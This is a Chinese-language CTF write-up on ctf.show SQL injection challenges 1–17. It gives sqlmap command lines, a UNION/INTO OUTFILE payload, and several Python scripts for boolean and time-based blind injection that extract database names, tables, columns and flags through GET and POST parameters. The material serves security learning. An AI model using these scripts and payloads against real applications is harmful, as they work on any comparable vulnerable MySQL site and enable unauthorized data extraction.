1-97布尔盲注时间盲注时间盲注(加速) 布尔盲注也同1011-16 表单形式布尔盲注时间盲注17
目标:
学sqlmap的使用方法,以及编写脚本
sqlmap用法大全:Usage · sqlmapproject/sqlmap Wiki · GitHub
1-9
python sqlmap.py -u "http://86f7cecd-a3fe-42ff-86e7-ac458123807d.challenge.ctf.show/?id=1" --batch --banner --batch 不需要用户输入,使用默认行为 --banner 判断DBMS的指纹 python sqlmap.py -u "http://86f7cecd-a3fe-42ff-86e7-ac458123807d.challenge.ctf.show/?id=1" --batch --dbs 得到DBMS的数据库 python sqlmap.py -u "http://86f7cecd-a3fe-42ff-86e7-ac458123807d.challenge.ctf.show/?id=1" --batch --tables -D ctfshow 得到ctfshow数据库的表 python sqlmap.py -u "http://86f7cecd-a3fe-42ff-86e7-ac458123807d.challenge.ctf.show/?id=1" --batch --dump -T flag -D ctfshow dump出ctfshow数据库 flag表中的信息 python sqlmap.py -u "http://86f7cecd-a3fe-42ff-86e7-ac458123807d.challenge.ctf.show/?id=1" --batch -D ctfshow -T flag --columns 得到ctfshow数据库 flag表中的列 -D 要枚举的数据库 --dbs 枚举出DBMS的数据库
7
没想到没有回显 可以用 into outfile的形式 (这里报错注入不知道为什么不行)
payload:
http://f0f8b18b-9240-4fde-98cc-10dd1ef882d0.challenge.ctf.show/?id=0')) union select 1,2,group_concat(schema_name) from information_schema.schemata into outfile "/var/www/html/1.txt"%23
访问1.txt
布尔盲注
假设sql语句是
select xx from yy where zz
select xx from yy where zz='0' or substr((select database()),1,1) = 'a'
所有盲注可以分为俩个基本问题(剩下的就是这个俩个基本问题的替换等价)
以及为了写脚本转化为or ascii(substr((select database()),1,1) )=i
-
字符串的截取
-
比较
#author Fnylad import requests s=requests.session() url="http://localhost/sqli-labs-master/Less-8/?id=0'" table="" for i in range(1,46): print(i) for j in range(32,127): #数据库名 web1 #payload = 'or ord(substr((select database()) from {0} for 1))={1}%23'.format(i,j) #爆表名 payload = 'or ord(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()) from {0} for 1))={1}%23'.format(i,j) #爆列名 payload = 'or ord(substr((select group_concat(column_name) from information_schema.columns where table_schema=database()) from {0} for 1))={1}%23'.format(i,j) rs=s.get(url=url + payload).text if 'You' in rs: table += chr(j) print(table) break
时间盲注
if((condition), sleep(5), 0); CASE WHEN (condition) THEN sleep(5) ELSE 0 END;
假设if
和case
被ban了,又想要根据condition的真假来决定是否触发sleep()
,可以将condition整合进sleep()
中,做乘法即可:
sleep(5*(condition))
很多人写脚本
import requests import time url = "http://c5dd886a-fb31-4b20-82ff-14ef39a7ff94.challenge.ctf.show/" dict = "0123456789abcdefghijklmnopqrstuvwxyz{}-" flag = "" for i in range(1,50): for j in dict: payload = f"?id=1' and if(substr((select database()),{i},1)=\"{j}\",sleep(5),0)--+" gloal = url + payload start = time.time() res = requests.get(url=gloal) end = time.time() if end-start > 4.9: flag += j print(flag) break
这其实不好!因为我们发现了除了sleep
其他基本都不太能精准控制延时时长,这样写脚本就是:你延时多久我就等你多久。太慢了!如果一次延时要一个小时,你也要等他一个小时吗?很明显不太明智。这样更好
try: requests.get(url, timeout=3) except: print("延时发生了,注入成功")
完整如下 跑flag的时候 注意要跑ctfshow的,不写明的话是跑当前的数据库security (被坑到一度怀疑自己!!)
# Author:Fnylad import requests url = "http://a2bebb9c-bd71-4441-bc7a-c2e4c66eed20.challenge.ctf.show/" dict = "0123456789abcdefghijklmnopqrstuvwxyz{}-" flag = "" for i in range(1,50): for j in dict: # 数据库 #payload = f"?id=1' and if(substr((select group_concat(schema_name) from information_schema.schemata),{i},1)=\"{j}\",sleep(5),0)--+" #ctfshow数据库中的表 #payload = f"?id=1' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=\'ctfshow\'),{i},1)=\"{j}\",sleep(5),0)--+" #ctfshow数据库的列 #payload = f"?id=1' and if(substr((select group_concat(column_name) from information_schema.columns where table_schema=\'ctfshow\'),{i},1)=\"{j}\",sleep(5),0)--+" #得到flag payload = f"?id=1' and if(substr((select group_concat(flag4a23) from ctfshow.flagug),{i},1)=\"{j}\",sleep(5),0)--+" gloal = url + payload try: res = requests.get(url=gloal,timeout=5) except: flag += j print(flag) break
时间盲注(加速) 布尔盲注也同
import requests import time url='http://01faf912-1730-485f-b5b4-01f0107b62ec.challenge.ctf.show:8080/?id=' flag='' for i in range(1,100): min=32 max=128 while 1: mid=min+(max-min)//2 if min==mid: flag+=chr(mid) print(flag) if chr(mid)=='}': exit() break #payload="1' and if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema='ctfshow')),{},1))<{},sleep(0.5),0)-- -".format(i,mid) #payload="1' and if(ascii(substr((select/**/group_concat(column_name)from(information_schema.columns)where(table_name='flagug')),{},1))<{},sleep(0.5),0)-- -".format(i,mid) payload="1' and if(ascii(substr((select/**/group_concat(flag4a23)from(ctfshow.flagug)),{},1))<{},sleep(0.5),0)-- -".format(i,mid) print(url+payload) try: r=requests.get(url=url+payload,timeout=0.5).text min=mid except: max=mid
10
加等级 5为最高级 我直接加了最高级 我觉得一级一级试还不如一开始跑最高级
python sqlmap.py -u "http://86f7cecd-a3fe-42ff-86e7-ac458123807d.challenge.ctf.show/?id=1" --batch --tables -D ctfshow --level 5
11-16 表单形式
python sqlmap.py -u http://2b4ce143-bb87-44e6-b3f9-c98b21e508b5.challenge.ctf.show/ --batch --forms -D ctfshow -T flagugsd --dump -- forms python sqlmap.py -u http://2b4ce143-bb87-44e6-b3f9-c98b21e508b5.challenge.ctf.show/ --wizard --wizard 新手向导页面 可以多多尝试 python sqlmap.py -u http://2b4ce143-bb87-44e6-b3f9-c98b21e508b5.challenge.ctf.show/ --batch --wizard -D ctfshow -T flagugsd --dump 也可以得到flag
布尔盲注
import requests import time url='http://3ae786d0-1fe7-471e-9aee-4255845dffc9.challenge.ctf.show:8080/' flag='' for i in range(1,100): min=32 max=128 while 1: mid=min+(max-min)//2 if min==mid: flag+=chr(mid) print(flag) if chr(mid)=='}': exit() break #-1') or sleep(10);# #payload="admin') and if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema='ctfshow')),{},1))<{},1,0)-- -".format(i,mid) #payload="admin') and if(ascii(substr((select/**/group_concat(column_name)from(information_schema.columns)where(table_name='flag')),{},1))<{},1,0)-- -".format(i,mid) payload="admin') and if(ascii(substr((select/**/group_concat(flag4)from(ctfshow.flag)),{},1))<{},1,0)-- -".format(i,mid) print(payload) data={ 'passwd':'a', 'uname':payload, } #try: r=requests.post(url=url,data=data).text if 'flag' in r: max=mid #print(r) #except: else: min=mid # time.sleep(0.3) # time.sleep(0.3)
时间盲注
import requests import time url='http://f4d786ab-1067-4c58-84d4-50e645bc0239.challenge.ctf.show/' flag='' for i in range(1,100): min=32 max=128 while 1: mid=min+(max-min)//2 if min==mid: flag+=chr(mid) print(flag) if chr(mid)=='}': exit() break #payload="admin' and if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema='ctfshow')),{},1))<{},sleep(0.5),0)-- -".format(i,mid) #payload="admin' and if(ascii(substr((select/**/group_concat(column_name)from(information_schema.columns)where(table_name='flagba')),{},1))<{},sleep(0.5),0)-- -".format(i,mid) payload="admin' and if(ascii(substr((select/**/group_concat(flag4sa)from(ctfshow.flagba)),{},1))<{},sleep(0.5),0)-- -".format(i,mid) data={ 'passwd':'a', 'uname':payload, } try: r=requests.post(url=url,data=data,timeout=0.5).text min=mid except: max=mid # time.sleep(0.3) # time.sleep(0.3)
17
passwd是漏洞点 发现难以检测漏洞点了 ,发现表单 可以用burp抓包后请求 抓包的内容保存在了1.txt
python sqlmap.py -r "C:\Users\86181\Desktop\1.txt" --dbs --threads 8
越到后面脚本使用越困难了。。